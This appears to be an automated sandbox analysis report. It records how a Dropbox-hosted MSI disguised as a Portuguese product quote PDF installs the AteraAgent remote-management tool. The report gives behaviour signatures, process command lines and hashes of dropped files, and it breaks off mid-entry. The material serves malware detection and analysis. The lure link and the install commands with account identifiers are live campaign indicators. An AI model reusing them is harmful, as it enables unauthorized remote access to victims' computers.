Analysis

  • max time kernel
    81s
  • max time network
    79s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-12-2024 16:31

General

  • Target

    https://www.dropbox.com/scl/fi/j3tjzg5l5cn8o2g9nhulc/Or-amentoProdutosPdf.msi?rlkey=zq16gpcx74mv2k73ut38hdjsw&st=h34fzzpv&dl=1

Malware Config

Signatures

  • AteraAgent

    AteraAgent is a remote monitoring and management tool.

  • Ateraagent family
  • Detects AteraAgent 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 31 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 14 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 35 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.dropbox.com/scl/fi/j3tjzg5l5cn8o2g9nhulc/Or-amentoProdutosPdf.msi?rlkey=zq16gpcx74mv2k73ut38hdjsw&st=h34fzzpv&dl=1
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffde2f6cc40,0x7ffde2f6cc4c,0x7ffde2f6cc58
      2⤵
        PID:5076
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,14221650133939150144,3094064445711253100,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1880 /prefetch:2
        2⤵
          PID:2448
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1740,i,14221650133939150144,3094064445711253100,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3
          2⤵
            PID:1392
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,14221650133939150144,3094064445711253100,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:8
            2⤵
              PID:4804
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,14221650133939150144,3094064445711253100,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:1
              2⤵
                PID:2200
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,14221650133939150144,3094064445711253100,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:1
                2⤵
                  PID:1648
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4908,i,14221650133939150144,3094064445711253100,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
                  2⤵
                    PID:1860
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4396,i,14221650133939150144,3094064445711253100,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:8
                    2⤵
                      PID:4244
                    • C:\Windows\System32\msiexec.exe
                      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\OrçamentoProdutosPdf.msi"
                      2⤵
                      • Blocklisted process makes network request
                      • Enumerates connected drives
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      PID:4100
                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                    1⤵
                      PID:3032
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                      1⤵
                        PID:532
                      • C:\Windows\system32\msiexec.exe
                        C:\Windows\system32\msiexec.exe /V
                        1⤵
                        • Enumerates connected drives
                        • Drops file in Program Files directory
                        • Drops file in Windows directory
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4724
                        • C:\Windows\system32\srtasks.exe
                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                          2⤵
                            PID:3496
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding 4BC8BA03E06908BC289E9BC380457E99
                            2⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:660
                            • C:\Windows\SysWOW64\rundll32.exe
                              rundll32.exe "C:\Windows\Installer\MSI16BF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240654234 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                              3⤵
                              • Loads dropped DLL
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:4000
                            • C:\Windows\SysWOW64\rundll32.exe
                              rundll32.exe "C:\Windows\Installer\MSI1A99.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240655015 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                              3⤵
                              • Blocklisted process makes network request
                              • Loads dropped DLL
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:872
                            • C:\Windows\SysWOW64\rundll32.exe
                              rundll32.exe "C:\Windows\Installer\MSI1E43.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240655937 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                              3⤵
                              • Loads dropped DLL
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:1688
                            • C:\Windows\SysWOW64\rundll32.exe
                              rundll32.exe "C:\Windows\Installer\MSI2BE4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240659468 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                              3⤵
                              • Blocklisted process makes network request
                              • Loads dropped DLL
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:1700
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding 05291CE2E162CC3FE23ABB87D9CB18CB E Global\MSI0000
                            2⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:4384
                            • C:\Windows\SysWOW64\NET.exe
                              "NET" STOP AteraAgent
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3464
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 STOP AteraAgent
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4016
                            • C:\Windows\SysWOW64\TaskKill.exe
                              "TaskKill.exe" /f /im AteraAgent.exe
                              3⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              PID:3232
                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                            "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="[email protected]" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000O6Av6IAF" /AgentId="2297eb79-f354-4f39-a723-720adf0c5b76"
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            PID:3796
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                          • Checks SCSI registry key(s)
                          PID:3992
                        • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                          "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                          1⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4912
                          • C:\Windows\System32\sc.exe
                            "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                            2⤵
                            • Launches sc.exe
                            PID:1236
                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                            "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2297eb79-f354-4f39-a723-720adf0c5b76 "143c51ac-6ab1-4cfb-ba95-ea959283f405" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000O6Av6IAF
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            PID:660
                        • C:\Windows\System32\rundll32.exe
                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                          1⤵
                            PID:812
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                            1⤵
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious use of FindShellTrayWindow
                            PID:5232
                          • C:\Windows\SysWOW64\DllHost.exe
                            C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                            1⤵
                            • System Location Discovery: System Language Discovery
                            PID:5280
                          • C:\Windows\SysWOW64\DllHost.exe
                            C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                            1⤵
                            • System Location Discovery: System Language Discovery
                            PID:5540

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Config.Msi\e581605.rbs

                            Filesize

                            8KB

                            MD5

                            d886d7bae49e907a65d78097d5a8aec9

                            SHA1

                            4a44642062c86351207f4c954a1fedaff7bd312e

                            SHA256

                            e8db43d215887b0e64cd54eb74c9e17b7185f1879f5f5e94efb649469481f7ec

                            SHA512

                            9b73ecb6e492aac63c78d1999d7052c6bd7241923f37eda2cd12e1ecba0b8fe1e49db39090c7cd492ebebeb36572f843783b00747046fae820e392fa99a274ba

                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

                            Filesize

                            142KB

                            MD5

                            477293f80461713d51a98a24023d45e8

                            SHA1

                            e9aa4e6c514ee951665a7cd6f0b4a4c49146241d

                            SHA256

                            a96a0ba7998a6956c8073b6eff9306398cc03fb9866e4cabf0810a69bb2a43b2

                            SHA512

                            23f3bd44a5fb66be7fea3f7d6440742b657e4050b565c1f8f4684722502d46b68c9e54dcc2486e7de441482fcc6aa4ad54e94b1d73992eb5d070e2a17f35de2f

                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config

                            Filesize

                            1KB

                            MD5

                            b3bb71f9bb4de4236c26578a8fae2dcd

                            SHA1

                            1ad6a034ccfdce5e3a3ced93068aa216bd0c6e0e

                            SHA256

                            e505b08308622ad12d98e1c7a07e5dc619a2a00bcd4a5cbe04fe8b078bcf94a2

                            SHA512

                            fb6a46708d048a8f964839a514315b9c76659c8e1ab2cd8c5c5d8f312aa4fb628ab3ce5d23a793c41c13a2aa6a95106a47964dad72a5ecb8d035106fc5b7ba71

                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                            Filesize

                            210KB

                            MD5

                            c106df1b5b43af3b937ace19d92b42f3

                            SHA1

                            7670fc4b6369e3fb705200050618acaa5213637f

                            SHA256

                            2b5b7a2afbc88a4f674e1d7836119b57e65fae6863f4be6832c38e08341f2d68

                            SHA512

                            616e45e1f15486787418a2b2b8eca50cacac6145d353ff66bf2c13839cd3db6592953bf6feed1469db7ddf2f223416d5651cd013fb32f64dc6c72561ab2449ae

                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                            Filesize

                            693KB

                            MD5

                            2c4d25b7fbd1adfd4471052fa482af72

                            SHA1

                            fd6cd773d241b581e3c856f9e6cd06cb31a01407

                            SHA256

                            2a7a84768cc09a15362878b270371daad9872caacbbeebe7f30c4a7ed6c03ca7

                            SHA512

                            f7f94ec00435466db2fb535a490162b906d60a3cfa531a36c4c552183d62d58ccc9a6bb8bbfe39815844b0c3a861d3e1f1178e29dbcb6c09fa2e6ebbb7ab943a

                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

                            Filesize

                            173KB

                            MD5

                            fd9df72620bca7c4d48bc105c89dffd2

                            SHA1

                            2e537e504704670b52ce775943f14bfbaf175c1b

                            SHA256

                            847d0cd49cce4975bafdeb67295ed7d2a3b059661560ca5e222544e9dfc5e760

                            SHA512

                            47228cbdba54cd4e747dba152feb76a42bfc6cd781054998a249b62dd0426c5e26854ce87b6373f213b4e538a62c08a89a488e719e2e763b7b968e77fbf4fc02

                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll

                            Filesize

                            588KB

                            MD5

                            17d74c03b6bcbcd88b46fcc58fc79a0d

                            SHA1

                            bc0316e11c119806907c058d62513eb8ce32288c

                            SHA256

                            13774cc16c1254752ea801538bfb9a9d1328f8b4dd3ff41760ac492a245fbb15

                            SHA512

                            f1457a8596a4d4f9b98a7dcb79f79885fa28bd7fc09a606ad3cd6f37d732ec7e334a64458e51e65d839ddfcdf20b8b5676267aa8ced0080e8cf81a1b2291f030

                          • C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt

                            Filesize

                            220B

                            MD5

                            64067e8a4029a9c2dbce009b40d775be

                            SHA1

                            bea47c8ee2d0e11136f65aeb67b6b6f6bcfc7857

                            SHA256

                            1cbc563e9b0585ad718dc7dec2373c33c0631c70beec379e173ec03e8f866913

                            SHA512

                            3fc0f029f7cd1768ad5cd136a362d45583df23187a07e6ad718464c0b18726ec03979971adb73dfad4084a8f20f95ddad9d4594c04006e35f9479a71d97b1c98

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                            Filesize

                            471B

                            MD5

                            b6102b47f3d2450f02c1167e5b337e9b

                            SHA1

                            91a6e5d7b3540556c971bcd6cdf52abd2cffcbfe

                            SHA256

                            e0c2d57c8661d444666ae009725ee84cd33a29ac48738277ea37bfd56b3cf8c4

                            SHA512

                            62bb67b325b56c41544956928ef0991262df019a470fc5792ba5abb7096e419f7ea3c8326560ffbe2b50ed0612fbc968fdf7564793a4d550b2465b799cbfcedf

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                            Filesize

                            727B

                            MD5

                            a433d0bd40ae75fbd372efe3fd3e2bc6

                            SHA1

                            137005873f5a1d269a7047adbcd08f5d204a323b

                            SHA256

                            83599ee2c90c3ef5da0f1d87bb6155bdcd2e70b97ad2163e4247f74f0925e1ec

                            SHA512

                            dca032c59d56db32821d19d913cb7519fbc0545bdc5b19cc6ca9eebf2faa8dca9739d4190b269c34438bca85879a271108f0641c2b653df37f08bfb9224150cb

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                            Filesize

                            727B

                            MD5

                            dd4a6de11c5aca03831ce2c397816af4

                            SHA1

                            98aa2153abf98ed443bb2214471fad28f61db070

                            SHA256

                            49f3eb5a31dc7c52694a2baa6defe57f668a679c3fc5cc736162b6e1e2cf4bb3

                            SHA512

                            8c0de17a3838d920121901226aa8d72b8434b8ea00f6d9a0e354d05049b5cb56c6bb7f9f9325e882077cbfb43f8da5f71b8f50675569c9a3a163c20a457c9694

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                            Filesize

                            400B

                            MD5

                            c3190112bf5f051bc11026fd6915f976

                            SHA1

                            ade71aadaee668fa93a4af9e87cc0c24a5b2c026

                            SHA256

                            f3ed7a1dbdab4c8bfc4a83e2074564ed96d94b5bce8dee4ac11549be4f6b12ac

                            SHA512

                            f9ce68790e17ac73259b6e43b9261f9e856357da455539b00f580ce9d8c321d7755507ffd6231d1da1de448720611fbdcaf9a90b91446e2f1a70c4c16a1d7ea4

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                            Filesize

                            404B

                            MD5

                            3b734a3bb20d511376b63c55c28ff272

                            SHA1

                            0f592a85de2f0ecba9558f250d400c00942136b7

                            SHA256

                            093e8d077a015c6f5a1565a5d1332c6892d673c3e59408183848ddbf265aa070

                            SHA512

                            5dec6213df0df0d0f78b600d6e01e139f9a3ac4534a2801ed927844c3ced8bf1c4c68c1943c8e1df71bebfda591ec734f95ebebb00007a20160d4e0631871b44

                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                            Filesize

                            412B

                            MD5

                            c2dbbcead0845c51296af20a1e22127d

                            SHA1

                            ab8175c15e01370274df77a841d9af34aaa52ba2

                            SHA256

                            38ee6d34f18aa3706ceb3a480f0014d3fb5411c698f9ed849a890437c846fee0

                            SHA512

                            7a3a3c3bb5e1721794deb450e5a966309bdec19f4d928533a6df435a419c60984e9a8237e2e0eb9d4647ad3225de5ddddd27b29fbc2ca71653f164da45d6bc59

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                            Filesize

                            649B

                            MD5

                            d6d8b3e907a442e69542cfe906210711

                            SHA1

                            17a393850af35c08153108b998e50aae52a5d315

                            SHA256

                            ddf778a1ec460bb1f91f13ded4cfd89eab4a1fcd8c5ce577b3fafe253a0c7fde

                            SHA512

                            c3a6f1994bb1be72e8c9c47252b50342bd814de52c37a29dd012a28e4e0ce3d0a7aa6eae0682014c17014ea046b597c9f0850786bc7999992bbb5b8846720f79

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                            Filesize

                            2KB

                            MD5

                            854c269cbe36fa1ad13475d6f270670f

                            SHA1

                            7b02ba311d320a4581d4e2c1f6a76ee586348a8d

                            SHA256

                            a32a44b1997a7b449ae3985b2c60cf563cd268f589dd9555b614c2ecdc213e23

                            SHA512

                            56a7c5e5f86593a112fb02b12355755649c89ecbc5e6ec5a8f57234e577b4a58e1538562b9ec5d6dd9aa4e4895a562d8a1972acb8a5d0030dd9b9e9cf0b1fcb2

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                            Filesize

                            1KB

                            MD5

                            b8ff6e53083d2c5e69f0466995f7b100

                            SHA1

                            34ff4a7b9334aafa20169886043c5907029be7fc

                            SHA256

                            78c41dfb934a6a39c1f57054d4ba6490b65e113ac9dfd1da202d11f8122c8c19

                            SHA512

                            48a872a1bddbd8f988522923922501de28525d39b4d9ed50bd9f6ff1e5926b29e07a6f6a2ec3ad705ef0efc093ce9c0e1aa81b48df23352201ffa190d92ed22e

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                            Filesize

                            2B

                            MD5

                            d751713988987e9331980363e24189ce

                            SHA1

                            97d170e1550eee4afc0af065b78cda302a97674c

                            SHA256

                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                            SHA512

                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                            Filesize

                            690B

                            MD5

                            d8b581926f3f9cc28a55fbfb837adcfd

                            SHA1

                            0cc4fc147ed617b38bd3168f563ad6f3f4db11e0

                            SHA256

                            ec1c327446c276bef77edcb5cce1984d031c44865ea661aa98ceaa01c632c53f

                            SHA512

                            05129e4dc08f92f3b44f7b351b60742d91d92cdd51a76cc248d8d54a4640adbf1d99ffa0bf927d368fb80915b41521b8cf58370bfb3655bbd949e1ae8a41beea

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                            Filesize

                            9KB

                            MD5

                            75cb59dd5921fd4b38d08145fed79edb

                            SHA1

                            eddc48c3872e9b47dcf7c9240433e2c21c4af8ef

                            SHA256

                            4e82a42b07c2f35621eadce36ac4e6d85fcd11ef5b9fc14bb2a560e3122a0eb1

                            SHA512

                            c14ae3501ce5745d2e1fd8a17df16444a89ea3784b71cc7b807ffd960f6c2103ede81b756b97f2db32692228ccf41fe05a18f7b2ca5692b5b540c709ce722362

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                            Filesize

                            9KB

                            MD5

                            dee6e6f31482b24eb06ad88a516de30a

                            SHA1

                            5224768124cf02a4d2e6b8bdcc78c937c1222203

                            SHA256

                            5a6e2d110cc9675aae0df2666cb320cc3574c4f260aa3ee8a8f261b67f0eff7c

                            SHA512

                            4435db0463460d55f111e4594c1d68521e0a8a8c1b4353c7cef9f0716efc2d93d12b2831882393e67ee39a58aba3e0ef6e8e3a3d6f8c4ebef924d27b1b55bc75

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                            Filesize

                            9KB

                            MD5

                            d1e4a29e60bf72f7ef6bca7827f5023d

                            SHA1

                            02c1bf4a04b79d004d12672daa635413e1d5c983

                            SHA256

                            4739bb2694ba45c82677ca586b8683748e5d4d892c9d12af76ea5ed2f7529498

                            SHA512

                            9dfad5a71bb4833274e62c5722f8ac56df9ee516b6af3130b36a6fe55e29fc354d80f7dad208b67ff4b32c1af975827e6f6d4ed80eccb1186319301fa9f9e07d

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                            Filesize

                            9KB

                            MD5

                            6189cc292c1d7a35435fb674614a3dd3

                            SHA1

                            f4a3e0bd838ff8a48887269e81c724bb153bbdcd

                            SHA256

                            495014fffd730bf6401da6181cefa987ae8de5d31f9242840db6829910302a23

                            SHA512

                            39ad5036f8acb45a07bddc0d2cdabace83202493e2ce4946acd47a1731dc01cb1637cb2e17c4126ba2a4471b35ed3dedc62e54f8fe7f11de1816d778784042fb

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                            Filesize

                            9KB

                            MD5

                            fdd9b058f8076b90564f19c045f47ccb

                            SHA1

                            e6cb44246f89a886fccc4035678d53e0cbe8aad5

                            SHA256

                            d4b3d5f6e17ccb978bca05cd1b3495d62f6685cff7cbc305c4e86a952970a66b

                            SHA512

                            4619b2ad8c0e34e53d929c1ecbc0e7ccb166dc1d2c6ead4ec0aec14181b0bae30a352befecb40d3be185013d7d1c20a2d79e8fb41e0cb941ba002ad20315fce6

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                            Filesize

                            116KB

                            MD5

                            9c0c685d97f5fd236c71fe58f18e7d1f

                            SHA1

                            67383d75bde4492f5f4a58010929450356a5d46d

                            SHA256

                            e61c7facc04591c23909b9ce8fd4c5ea2c5c1be553c3b3efc25890905069ffeb

                            SHA512

                            7d0f007dddd64af10eb98aa2d66536ba87a967f24afcea8aac5c88003f78970fae170b7b9f19c1d2292cb7da596b62013fa9d15306c235212f4cf47e74a6d32e

                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                            Filesize

                            116KB

                            MD5

                            fb02eaeea1dcb9727ac81bf1608e340b

                            SHA1

                            bc06e7fcd06cd78472b1b980d80b8bb727e50a41

                            SHA256

                            710ed14f2b4be3fc668720787ec11749031180390203840c9e3e3d183db917cd

                            SHA512

                            530cfa6e06ca1832a9666fe068ec31e99dd72e21abe829b44bf954f66ee35fca72fa07e2be0b064e483ebd87b6feb1dbf364ce404c1c84b841946956f896828e

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                            Filesize

                            651B

                            MD5

                            9bbfe11735bac43a2ed1be18d0655fe2

                            SHA1

                            61141928bb248fd6e9cd5084a9db05a9b980fb3a

                            SHA256

                            549953bd4fc8acc868a9374ec684ebd9e7b23939adf551016f3433b642697b74

                            SHA512

                            a78c52b2ddc057dabf260eeb744b9f55eab3374ad96e1938a291d2b17f204a0d6e1aa02802de75f0b2cd6d156540d2ddee15e889b89d5e619207054df4c1d483

                          • C:\Users\Admin\Downloads\Unconfirmed 922534.crdownload

                            Filesize

                            2.9MB

                            MD5

                            db4fb1435b38c0356341f3ba240b81b4

                            SHA1

                            48d5a1ff9d41dbb0b13ce17ae1f6d79be96a1bc8

                            SHA256

                            7c3142768abb93df6e5a48d19bb98be75a7c546cd4f39d7009fd05393dfc9d13

                            SHA512

                            9b637a4d3846b61cf960e168dcfee2d7c39808b4cf54e2e034e2d7d7bd201d32e3032bba5f42d9a996c193ff4c9b3816c3318836b476dbda1394c626654821f3

                          • C:\Windows\Installer\MSI16BF.tmp

                            Filesize

                            509KB

                            MD5

                            88d29734f37bdcffd202eafcdd082f9d

                            SHA1

                            823b40d05a1cab06b857ed87451bf683fdd56a5e

                            SHA256

                            87c97269e2b68898be87b884cd6a21880e6f15336b1194713e12a2db45f1dccf

                            SHA512

                            1343ed80dccf0fa4e7ae837b68926619d734bc52785b586a4f4102d205497d2715f951d9acacc8c3e5434a94837820493173040dc90fb7339a34b6f3ef0288d0

                          • C:\Windows\Installer\MSI16BF.tmp-\AlphaControlAgentInstallation.dll

                            Filesize

                            25KB

                            MD5

                            aa1b9c5c685173fad2dabebeb3171f01

                            SHA1

